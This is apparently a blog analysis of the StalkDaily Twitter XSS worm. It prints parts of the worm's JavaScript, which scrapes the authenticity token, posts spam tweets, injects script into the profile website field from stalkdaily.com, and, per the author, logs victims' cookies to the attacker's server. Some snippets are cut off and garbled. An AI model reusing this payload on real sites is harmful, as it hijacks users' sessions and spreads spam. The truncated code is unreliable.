Can I see a little code? Sure! Here’s the initial vector being injected into the user’s website field.
- XHConn - Responsible for making XMLHttpRequests to the twitter REST services
- urlencode - Which provides a modified URL Encoding scheme
In addition to the support functions, we can find the real action happening in the function called "wait". "wait" is responsible for constructing two separate XHR requests, one to post a status update and another to change the user's website url in their profile. Here it is in all its glory:var content = document.documentElement.innerHTML; authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g); var authtoken = authreg.exec(content); authtoken = authtoken; //alert(authtoken); var randomUpdate=new Array(); randomUpdate="Dude, www.StalkDaily.com is awesome. What's the fuss?"; randomUpdate="Join www.StalkDaily.com everyone!"; randomUpdate="Woooo, www.StalkDaily.com :)"; randomUpdate="Virus!? What? www.StalkDaily.com is legit!"; randomUpdate="Wow...www.StalkDaily.com"; randomUpdate="@twitter www.StalkDaily.com"; var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)]; updateEncode = urlencode(genRand); var xss = urlencode('http://www.stalkdaily.com">
In order to use Twitter's REST API, don't you need a username? Check out the snippet below:var content = document.documentElement.innerHTML; userreg = new RegExp(/"); document.write("");
In this section, located outside of the previous functions, the attacker logs the user's cookie information and username. Twitter places the user's username into the metadata at the top of the page, hence the "meta content=..." regex. With that information, the attacker has the ability to execute requests at will against Twitter's REST API by mimicing the users's current session. **Note the attacker logged the information to his server, meaning he could use that information outside a browser environment whenever he wants (within the user's valid session).
Did I miss something? or get it completely wrong!? Let me know. Hope this was helpful.